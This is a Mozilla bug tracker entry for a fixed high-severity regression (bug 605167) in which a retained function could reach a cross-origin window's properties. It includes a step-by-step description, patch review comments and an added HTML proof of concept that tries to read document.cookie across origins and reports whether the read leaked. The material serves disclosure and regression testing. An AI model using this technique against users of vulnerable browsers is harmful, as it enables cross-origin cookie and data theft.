Closed Bug 605167 Opened 11 years ago Closed 11 years ago

It's possible to access properties of a cross-origin window


(Core :: Security, defect)

Windows XP
Not set



Tracking Status
blocking2.0 --- beta7+
status1.9.2 --- unaffected
status1.9.1 --- unaffected


(Reporter: moz_bug_r_a4, Assigned: mrbkap)



(Keywords: regression, Whiteboard: [sg:high]fixed-in-tracemonkey)


(2 files)

This is a regression from landing of compartments.

1. Get a function from a same-origin window.
2. Load a cross-origin page in that window.

With that function, ComputeGlobalThis gets an outer window proxy that belongs
to the cross-origin window.  Thus, it's possible to access properties of the
cross-origin window via that outer window proxy.

The attached testcase aborts a debug build:
Assertion failure: compartment mismatched, at
Attached file testcase
This tries to get cookies for
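A reproduction sketch of the two steps in comment 0, added here; it is not the reporter's attached testcase and not Mozilla code. It assumes CROSS_ORIGIN_URL is a page on any origin other than the one the file is served from, and it uses an about:blank iframe (same-origin until it is navigated) in place of a separate same-origin window. The function is non-strict and is called with no receiver, so the engine has to compute a global this for it, which is the ComputeGlobalThis path the report describes. On a correct build that this is the outer window proxy for the caller's compartment, wrapped for cross-origin access, and the document read throws a SecurityError; on an affected build the read succeeds, which is the property leak the bug describes.

```html
<!DOCTYPE html>
<!-- Added reproduction sketch for bug 605167; not the attached testcase.
     Assumption: CROSS_ORIGIN_URL is a page on an origin other than this file's. -->
<meta charset="utf-8">
<title>bug 605167: retained function vs. cross-origin navigation</title>
<pre id="log"></pre>
<iframe id="target"></iframe>
<script>
var CROSS_ORIGIN_URL = "https://example.org/"; // assumption: any origin other than ours

function log(msg) {
  document.getElementById("log").textContent += msg + "\n";
}

var frame = document.getElementById("target");
var frameWin = frame.contentWindow; // about:blank: same-origin with us until navigated

// Step 1: obtain a function created in the (currently same-origin) window.
// It is non-strict and will be called with no receiver, so the engine must
// compute a global this for it (the ComputeGlobalThis path from the report).
var getGlobal = frameWin.eval("(function () { return this; })");

frame.addEventListener("load", function () {
  // The initial about:blank may also fire load; only proceed once the window
  // really is cross-origin, i.e. once location.href is no longer readable.
  try { void frameWin.location.href; return; } catch (e) { /* navigated cross-origin */ }

  // Step 3: call the retained function. Its this must be the outer window
  // proxy for *our* compartment (a cross-origin wrapper), not the raw outer
  // window of the navigated document.
  var outer = getGlobal();
  try {
    var cookie = outer.document.cookie; // must throw SecurityError across origins
    log("LEAK: read " + cookie.length + " bytes of document.cookie from " + CROSS_ORIGIN_URL);
  } catch (e) {
    log("OK: cross-origin access blocked (" + e.name + ")");
  }
});

// Step 2: navigate that window to a cross-origin page.
frame.src = CROSS_ORIGIN_URL;
</script>
```

Serve the file from an origin that differs from CROSS_ORIGIN_URL (a file:// URL is not enough, since file origins are treated specially); the only acceptable result line is the "OK" one.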
Blocks: compartments
blocking2.0: --- → beta7+
Assignee: nobody → mrbkap
Attached patch Fix
Andreas has a patch in bug 604516 that gets rid of the inner and outer object hooks in favor of slots with the outer object for that compartment. That'll make this patch obsolete, but the upshot here is that we need to make sure that when we outerize, we return the outer window for the right compartment.

I looked through all of the cases where we outerize and it appeared that there were exactly two where we actually wanted the uncompartmentalized outer window (both in WrapperFactory.cpp).
Attachment #484098 - Flags: review?(peterv)
Attachment #484098 - Flags: review?(lw)
Comment on attachment 484098

Sorry, I enjoyed the discussion, but I am unqualified to review this.
Attachment #484098 - Flags: review?(lw)
Comment on attachment 484098

Please add an automated testcase.
Attachment #484098 - Flags: review?(peterv) → review+
Keywords: regression
Whiteboard: fixed-in-tracemonkey → [sg:high]fixed-in-tracemonkey
Group: core-security